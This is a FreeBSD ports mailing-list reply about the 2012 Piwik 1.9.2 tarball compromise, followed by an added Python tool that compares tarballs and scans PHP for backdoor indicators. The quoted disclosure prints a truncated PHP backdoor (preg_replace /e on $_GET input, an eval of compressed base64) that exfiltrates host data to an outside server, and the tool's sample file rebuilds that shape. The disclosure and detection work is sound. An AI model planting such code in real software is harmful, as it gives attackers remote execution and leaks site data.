Date:      Tue, 27 Nov 2012 14:19:05 +0100
From:      "Hans Fr. Nordhaug" <hans@nordhaug.priv.no>
To:        Ruslan Mahmatkhanov <cvs-src@yandex.ru>
Cc:        FreeBSD Ports Mailing List <ports@freebsd.org>, ports-secteam@freebsd.org
Subject:   Re: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Message-ID:  <20121127131905.GA3839@hiMolde.no>
In-Reply-To: <50B4B6E9.9020605@yandex.ru>
References:  <50B3CE75.9060107@grobecker-wtal.de> <50B4B6E9.9020605@yandex.ru>

Hi,

I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
before I got this message. 

I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz
and compared it to my local copy of 1.9.2, and all files are unchanged.
It's just the archiving that changed the file size. The Piwik build
manager is a little bit sloppy ...

Regards,
Hans

* Ruslan Mahmatkhanov <cvs-src@yandex.ru> [2012-11-27]:
> => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
> => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz
> fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: 
> expected 5676196, actual 5676058
> 
> 
> 
> -------- Original message --------
> Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download 
> archive
> Date: Mon, 26 Nov 2012 21:17:57 +0100
> From: Maximilian Grobecker <max@grobecker-wtal.de>
> To: full-disclosure@lists.grok.org.uk
> 
> Hi,
> 
> this evening I downloaded a fresh archive of Piwik 1.9.2 and found this
> code at the bottom of the /piwik/core/Loader.php file:
> 
> (Just a short snippet)
> -----------snip-------------
> <?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
>      preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
>    }
>    if (file_exists(dirname(__FILE__)."/lic.log")) exit;
> eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s 
> 
> [.......]
> 
> -----------/snip-------------
> 
> 
> I decoded some parts of this code and found what it does:
> It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and
> the request URI via POST to http://prostoivse.com/x.php and creates a
> file named "lic.log" in the same directory.
> As long as this file exists it seems that no further POST requests are made.
> 
> At the moment I'm trying to figure out the further sense of this code,
> but it seems that there might also be some kind of backdoor (because of
> the use of $_GET).
> 
> The file in the downloadable archive is dated at
> Nov 26, 2012 / 18:42 UTC.
> 
> From forums I know that some people downloaded the archive earlier this
> day and don't have this code inside their files.
> 
> At the moment (at 8:08 PM UTC) the archive is downloadable at the
> original Piwik web site with this obfuscated code.
> 
> I contacted the developers and managers of Piwik a few minutes ago about
> this.
> 
> 
> -- 
> Greetings from Wuppertal, Germany
> 
> Max Grobecker
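The three checks that appear in this thread, taken together as an added Python example (it is not part of the mailing-list exchange, of the FreeBSD ports tree, or of Piwik's own code): the ports framework's size check only tells you that the archive bytes differ; Hans's approach of comparing the extracted files against a known-good copy tells you whether any file actually changed; and Max's observations give concrete indicators for a changed PHP file (`preg_replace` with the `/e` modifier fed from `$_GET`, `eval(gzuncompress(base64_decode(...)))`, error reporting silenced). All inputs are constructed in memory: the `Loader.php` stand-in is not Piwik's real file, the appended block only mirrors the shape of the quoted snippet with a placeholder base64 string, and the two "repacked" tarballs show that a different archive size with identical per-file hashes is exactly the benign case Hans describes.

```python
"""Audit a downloaded release tarball against a known-good copy.

Added example for this thread; all inputs below are constructed, not Piwik's files.
"""
import hashlib
import io
import re
import tarfile

# Indicator patterns modelled on the snippet quoted in the thread (constructed regexes).
INDICATORS = [
    ("preg_replace /e on request data",
     re.compile(r"preg_replace\s*\(\s*[\"'][^\"']*/e[\"']\s*,\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("eval(gzuncompress(base64_decode(...)))",
     re.compile(r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(", re.I)),
    ("error_reporting(0)",
     re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I)),
]


def make_tar(files, compresslevel=6, mtime=0):
    """Pack {path: bytes} into an in-memory .tar.gz (used only to build sample input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz", compresslevel=compresslevel) as tf:
        for path, content in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            info.mtime = mtime
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def tar_contents(data):
    """Return {member path: file bytes} for every regular file in a .tar.gz blob."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for member in tf.getmembers():
            if member.isfile():
                out[member.name] = tf.extractfile(member).read()
    return out


def sha256(content):
    return hashlib.sha256(content).hexdigest()


def scan_php(content):
    """Names of the indicator patterns present in one PHP file's bytes."""
    text = content.decode("utf-8", errors="replace")
    return [name for name, rx in INDICATORS if rx.search(text)]


def audit(known_good, candidate):
    """Compare two tarballs file by file (archive size is deliberately ignored),
    then scan every added or changed .php member for the indicators."""
    good = tar_contents(known_good)
    cand = tar_contents(candidate)
    report = {
        "added": sorted(set(cand) - set(good)),
        "removed": sorted(set(good) - set(cand)),
        "changed": sorted(p for p in set(good) & set(cand)
                          if sha256(good[p]) != sha256(cand[p])),
        "suspicious": {},
    }
    for path in report["added"] + report["changed"]:
        if path.endswith(".php"):
            hits = scan_php(cand[path])
            if hits:
                report["suspicious"][path] = hits
    return report


# --- constructed sample archives (stand-ins, not the real Piwik 1.9.2 files) ----
CLEAN_LOADER = (b"<?php\n// constructed stand-in for piwik/core/Loader.php\n"
                b"class Piwik_Loader {}\n?>\n")
CLEAN_FILES = {
    "piwik/index.php": b"<?php\nrequire_once 'core/Loader.php';\n",
    "piwik/core/Loader.php": CLEAN_LOADER,
}
# The appended block follows the shape of the quoted snippet; the base64 string is a
# placeholder ("PLACEHOLDER"), not the payload from the real archive.
TAMPERED_FILES = dict(CLEAN_FILES)
TAMPERED_FILES["piwik/core/Loader.php"] = CLEAN_LOADER + (
    b"<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {\n"
    b"     preg_replace(\"/(.+)/e\", $_GET['g'], 'dwm');     exit;\n"
    b"   }\n"
    b"   if (file_exists(dirname(__FILE__).\"/lic.log\")) exit;\n"
    b"eval(gzuncompress(base64_decode('UExBQ0VIT0xERVI=')));\n"
)

KNOWN_GOOD = make_tar(CLEAN_FILES, compresslevel=9, mtime=0)
# Same files repacked with other gzip/tar settings: usually a different byte
# size (which is all `fetch` compares), but identical per-file hashes.
REPACKED = make_tar(CLEAN_FILES, compresslevel=1, mtime=1353951720)
TAMPERED = make_tar(TAMPERED_FILES, compresslevel=9, mtime=1353955320)

if __name__ == "__main__":
    for label, blob in (("repacked", REPACKED), ("tampered", TAMPERED)):
        print(label, len(KNOWN_GOOD), "vs", len(blob), "bytes:",
              audit(KNOWN_GOOD, blob))
```

Against a real download you would pass the bytes of the distfile from `/usr/ports/distfiles/` as `known_good` and the freshly fetched archive as `candidate`; the point of hashing members rather than the archive is that a repack by the upstream build manager produces an empty `changed` list, while a modified `Loader.php` shows up both as changed and, through the indicator scan, as worth reading before anything is installed.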



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20121127131905.GA3839>